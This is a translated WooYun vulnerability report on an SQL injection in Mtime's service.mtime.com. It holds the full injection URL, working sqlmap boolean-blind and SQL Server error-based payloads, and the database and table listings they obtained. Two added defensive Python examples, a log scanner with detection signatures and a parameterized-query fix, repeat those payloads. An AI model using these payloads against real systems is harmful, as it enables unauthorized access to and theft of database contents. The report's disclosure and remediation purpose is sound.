
Vulnerability Summary

Defect ID: wooyun-2015-0137434

Title: SQL injection on a Mtime site (database dump possible; contents of multiple databases readable)

Vendor: Mtime (时光网)

Author: 路人甲

Submitted: 2015-08-27 18:00

Fixed: 2015-10-11 18:16

Published: 2015-10-11 18:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-08-27: Details sent to the vendor; awaiting vendor handling
2015-08-27: Vendor confirmed; details disclosed to the vendor only
2015-09-06: Details disclosed to core white hats and domain experts
2015-09-16: Details disclosed to regular white hats
2015-09-26: Details disclosed to intern white hats
2015-10-11: Details disclosed to the public

Brief description:

test

Detailed description:

Mtime's http://service.mtime.com/ has an SQL injection vulnerability through which the contents of a large number of databases can be dumped.

Proof of vulnerability:

Injection URL: http://service.mtime.com/Service/Movie.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.MovieService&Ajax_CallBackMethod=GetRatingsByMovieIds&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fnews.mtime.com%2F2013%2F12%2F14%2F1521722.html&t=20158271514642113&Ajax_CallBackArgument0=135791-0

Parameter: Ajax_CallBackArgument0 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.MovieService&Ajax_CallBackMethod=GetRatingsByMovieIds&Ajax_CrossDomain=1&Ajax_RequestUrl=http://news.mtime.com/2013/12/14/1521722.html&t=20158271514642113&Ajax_CallBackArgument0=135791-0) AND 4897=4897 AND (6132=6132
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.MovieService&Ajax_CallBackMethod=GetRatingsByMovieIds&Ajax_CrossDomain=1&Ajax_RequestUrl=http://news.mtime.com/2013/12/14/1521722.html&t=20158271514642113&Ajax_CallBackArgument0=135791-0) AND 9436=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9436=9436) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(107)+CHAR(113))) AND (7640=7640
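The sqlmap output above shows the two techniques that worked against the Ajax_CallBackArgument0 parameter: a boolean-based blind tautology and an error-based payload that abuses CONVERT(INT, ...) on SQL Server. From the defender's side, both leave a clear trace in web server logs, because the parameter legitimately carries only a pair of integers joined by a hyphen (135791-0). The following is an added example, not part of the original report and not Mtime's code: it parses constructed IIS-style log lines (date, time, method, uri-stem, uri-query, status; the query strings are the benign request and the two payloads quoted above) and flags any request whose Ajax_CallBackArgument0 departs from the expected <int>-<int> shape or matches the signatures of either technique.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qs

# Constructed sample log in an IIS/W3C-like layout:
# date time method uri-stem uri-query status
# Line 1 is the normal request; lines 2 and 3 carry the two sqlmap payloads
# from the report, percent-encoded as a web server would log them.
SAMPLE_LOG = """\
2015-08-27 15:14:42 GET /Service/Movie.msi Ajax_CallBack=true&Ajax_CallBackMethod=GetRatingsByMovieIds&Ajax_CallBackArgument0=135791-0 200
2015-08-27 15:14:43 GET /Service/Movie.msi Ajax_CallBack=true&Ajax_CallBackMethod=GetRatingsByMovieIds&Ajax_CallBackArgument0=135791-0)%20AND%204897%3D4897%20AND%20(6132%3D6132 200
2015-08-27 15:14:44 GET /Service/Movie.msi Ajax_CallBack=true&Ajax_CallBackMethod=GetRatingsByMovieIds&Ajax_CallBackArgument0=135791-0)%20AND%209436%3DCONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(113))) 500
"""

# The only shape the endpoint legitimately receives in this parameter:
# a movie id, a hyphen, and a second integer (135791-0 in the report).
EXPECTED_ARG = re.compile(r"^\d+-\d+$")

# Signatures of the two techniques sqlmap reported as working.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("error-based (MSSQL CONVERT)", re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT", re.I)),
]


def inspect_query(query: str) -> list[str]:
    """Return the reasons a percent-encoded query string looks like injection
    against the GetRatingsByMovieIds endpoint; empty list means clean."""
    reasons: list[str] = []
    # parse_qs splits on '&' and '=' first, then percent-decodes each value,
    # so '%3D' inside a payload becomes '=' without breaking the split.
    params = parse_qs(query, keep_blank_values=True)
    for value in params.get("Ajax_CallBackArgument0", []):
        if not EXPECTED_ARG.match(value):
            reasons.append("Ajax_CallBackArgument0 outside expected <int>-<int> format")
        for name, pattern in SIGNATURES:
            if pattern.search(value):
                reasons.append(name)
    return reasons


def scan_log(log_text: str) -> list[tuple[int, int, list[str]]]:
    """Scan log lines and return (line number, HTTP status, reasons) for each
    suspicious request. The status is kept because error-based probes tend to
    surface as 500s, which makes them easy to correlate in the alert."""
    hits: list[tuple[int, int, list[str]]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        if len(fields) < 6:
            continue  # constructed format: skip malformed or blank lines
        query, status = fields[4], int(fields[5])
        reasons = inspect_query(query)
        if reasons:
            hits.append((lineno, status, reasons))
    return hits


if __name__ == "__main__":
    for lineno, status, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno} (HTTP {status}): {', '.join(reasons)}")
```

The format check alone is the more robust of the two signals: signature lists lag behind tooling, but a strict whitelist on what the parameter may contain does not, and the same whitelist is what the application itself should enforce before the value reaches a query.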


Database information can be obtained through the injection:

[Screenshot: 1.jpg]


available databases [23]:
[*] distribution
[*] master
[*] model
[*] msdb
[*] MtimeAward
[*] mtimedailycount
[*] MtimeDVD
[*] MtimeEvents
[*] MtimeFeed
[*] MtimeFlamingoCenter
[*] MtimeGroupBuy
[*] MtimeJinYi
[*] MtimeMerchant
[*] MtimeNTC
[*] MtimeSchedule
[*] MtimeSub2
[*] MtimeTicket
[*] MtimeTicketNew
[*] MtimeTweet
[*] MtimeZYXM
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


The current database is MtimeSchedule; its tables were enumerated:

[Screenshot: 2.jpg]


+-------------------------------------+
| AndroidRegisterAPN |
| AndroidRemindMovieOfPush |
| BaiduMovieCache |
| BroadcastUnSubscriptionWithDevice |
| CacheContent |
| Comment |
| ExternalRecommendItem |
| ExternalRecommendItemMatchMovie |
| ExternalRecommendItemMatchMoviebak |
| ExternalRecommendItemVideo |
| ExternalRecommendItemVideobak |
| ExternalRecommendItembak |
| ExternalRecommendVideo |
| ExternalRecommendVideoGroup |
| ExternalRecommendVideoGroupVideo |
| ExternalRecommendVideoGroupVideobak |
| ExternalRecommendVideoGroupbak |
| ExternalRecommendVideoMatchMovie |
| ExternalRecommendVideobak |
| ExternalVideo |
| IgnoreKeyword |
| KeywordBase |
| KeywordMatch |
| KeywordMatchObject |
| M08_MovieAttitudeStatistic |
| M08_MovieRatingStatistic |
| M08_PersonRatingStatistic |
| MovieAttitude |
| MovieBarHTML |
| MovieCache |
| MovieCommentHeatScore |
| MovieConnection |
| MovieConnectionType |
| MovieEditorRating |
| MovieExternalVideo |
| MovieHotRanking |
| MovieIntegrate |
| MovieIntegrateInc |
| MoviePerson |
| MovieRating |
| MovieRatingLog |
| MovieRatingStatistic |
| MovieRatingStatistics |
| MovieRatingSummary |
| MovieRecommendation |
| MovieRelatedMovie |
| MovieReleaseInfo |
| MovieScorePower |
| MovieSearchKeywords |
| MovieVideoSearchConfig |
| MovieYearRecommend |
| MoviegoingLog |
| MoviegoingLogStat |
| PageContentCache08 |
| PersonArchivesRelation |
| PersonCache |
| PersonFilmography |
| PersonIntegrate |
| PersonIntegrateInc |
| PersonIntegrate_bak |
| PersonRating |
| PersonRatingStatistics |
| PersonRatingSummary |
| PersonScorePower |
| Promotion |
| RatingParameter |
| RemindMovieOfPush |
| TVSectionExternalVideo |
| TVSeries |
| TVSeriesParagraphSeason |
| TVSeriesParagraphSection |
| TVSeriesParagraphVersion |
| TVSeriesParagraphs |
| TVSeriesSeason |
| TweetShield |
| UserAttentionMovie |
| UserFindFriendsConfig |
| UserMovieRemind |
| UserMovieRemindDetail |
| UserMovieTagCount |
| UserRelatedUserByEMailAddress |
| WPRegisterPushNotifications |
| WPRemindMovieOfPush |
| movieattitude4movie210259 |
| movieattitudeip4movie210259 |
| movieratingbak |
| movieratingpassuser |
| mymovie |
+-------------------------------------+


The contents of one arbitrary table were dumped:

[Screenshot: 4.jpg]


Several other databases were also enumerated.
MtimeAward database
Table information:

[Screenshot: 5.jpg]


Data in the tables:

[Screenshot: 6.jpg]


MtimeNTC database

[Screenshot: 3.jpg]


The remaining databases can presumably be dumped as well; they were not tried one by one.

Remediation:

Apply proper input filtering.

Copyright notice: when republishing, credit 路人甲@乌云 (WooYun).
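"Proper filtering" on its own is the weaker half of the fix. The payloads in the proof section work because the argument is spliced into SQL text; the durable remedy is to validate the parameter against the one shape it may take and to pass the resulting integers to the database as bound parameters, so that the text of the argument can never alter the statement. The block below is an added illustration, not the report's or Mtime's code. It assumes a hypothetical query shape in which Ajax_CallBackArgument0 is <movie id>-<rating kind> and is wrapped in parentheses (the paren-closing payload suggests this, but the report does not show the server code), and it uses SQLite in place of SQL Server with a constructed toy MovieRating table so that it runs offline.

```python
from __future__ import annotations

import re
import sqlite3

# Constructed toy schema standing in for a rating table on MtimeSchedule;
# SQLite is used here purely so the example runs offline.
_SCHEMA = """
CREATE TABLE MovieRating (MovieId INTEGER, RatingKind INTEGER, Score REAL);
INSERT INTO MovieRating VALUES (135791, 0, 7.8), (135791, 1, 8.1), (210259, 0, 6.4);
"""

# Whitelist: the parameter is exactly two integers joined by one hyphen.
# Bounding the digit count also keeps the values inside a 32-bit int.
ARG_FORMAT = re.compile(r"^(\d{1,9})-(\d{1,9})$")


def parse_callback_argument(raw: str) -> tuple[int, int]:
    """Accept only <movie id>-<rating kind>; anything else is rejected before
    it gets anywhere near a query."""
    m = ARG_FORMAT.match(raw)
    if not m:
        raise ValueError(f"rejected Ajax_CallBackArgument0: {raw!r}")
    return int(m.group(1)), int(m.group(2))


def build_query_unsafe(raw: str) -> str:
    """The pattern behind the finding (assumed shape): the raw argument is
    concatenated into the statement. Returned as text only, to show how a
    value that closes and reopens the parentheses rewrites the WHERE clause."""
    movie_part, _, kind_part = raw.partition("-")
    return (
        "SELECT Score FROM MovieRating WHERE (MovieId = "
        + movie_part + " AND RatingKind = " + kind_part + ")"
    )


def get_rating(conn: sqlite3.Connection, raw: str) -> float | None:
    """Hardened version: validate first, then bind the integers as parameters.
    The driver sends the values separately from the SQL text, so no content
    of `raw` can change the statement's structure."""
    movie_id, kind = parse_callback_argument(raw)
    row = conn.execute(
        "SELECT Score FROM MovieRating WHERE MovieId = ? AND RatingKind = ?",
        (movie_id, kind),
    ).fetchone()
    return row[0] if row else None


def demo_connection() -> sqlite3.Connection:
    """In-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(_SCHEMA)
    return conn


if __name__ == "__main__":
    conn = demo_connection()
    print(get_rating(conn, "135791-0"))  # normal request
    # The boolean-based payload from the report: rejected by the whitelist.
    try:
        get_rating(conn, "135791-0) AND 4897=4897 AND (6132=6132")
    except ValueError as exc:
        print(exc)
```

Two design points are worth noting. The whitelist is a positive description of valid input rather than a blacklist of SQL keywords, so it does not need updating as tooling changes; and the parameterized query is the control that actually removes the injection, which means the validation can fail closed without the database ever being the last line of defence. The same pattern applies unchanged to SqlCommand parameters in the ASP.NET stack the service runs on.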


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-08-27 18:14

Vendor reply:

We will fix it as soon as possible, thanks.

Latest status:

None